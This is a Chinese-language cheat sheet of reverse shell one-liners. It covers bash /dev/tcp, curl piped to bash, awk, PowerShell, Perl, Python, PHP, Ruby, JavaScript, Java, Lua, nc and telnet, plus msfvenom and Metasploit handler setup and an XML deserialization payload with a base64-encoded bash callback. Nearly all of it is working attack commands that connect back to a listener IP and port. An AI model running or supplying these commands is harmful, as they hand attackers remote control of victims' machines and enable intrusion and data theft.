Linux反弹shell
bash
bash -i >& /dev/tcp/192.168.0.135/4444 0>&1
curl
curl 192.168.0.135/shell | bash
shell文件内容
bash -i >& /dev/tcp/192.168.0.135/4444 0>&1
exec
exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
AWK
awk 'BEGIN {s = "/inet/tcp/0/192.168.0.135/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Windows反弹shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.135',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
MSF反弹shell
Winsows反弹shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<当前监听者IP> LPORT=<监听者端口> -f psh-reflection > xxx.ps1
将ps1文件移动到站点目录下
开启msf并进行端口监听配置
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.253.129
set lport 19111
exploit/run
通过powershell执行该文件
Linux反弹shell
详情可参考:MSF –Linux后门之elf文件
不同语言反弹shell
perl
perl -e 'use Socket;$i="192.168.0.135";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' /*linux可以这样写*/
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' /*linux可以这样写*/
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' /*windows可以这样写*/
#又或者直接写个pl文件也可以
#1.pl
use Socket;
$i="x.x.x.x";
$p=4444;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
{
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.135",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("192.168.0.135",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.0.135",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
javascript
c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/ip/port 0>&1'],); console.log(ls.output.toString());")()
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.135','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
其他反弹shell
nc
nc -e /bin/sh 192.168.0.135 4444 /*有的发行版linux没有-e的参数*/
nc 192.168.0.135 4444 | /bin/bash | nc 192.168.0.135 5555 /*如果nc没有-e的参数*/
telnet
rm -f /tmp/p; mknod /tmp/p p &&&& telnet attackerip 4444 0/tmp/p
telnet attackerip 4444 | /bin/bash | telnet attackerip 4444
xml
<?xml version="1.0" encoding="UTF-8"?>
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8zOGRtMjI1NzQ5LjUxdmlwLmJpei8yNzg3OSAwPiYxJw}|{base64,-d}|{bash,-i}</string>
</void>
</array>
<void method="start"/>
</object>
</java>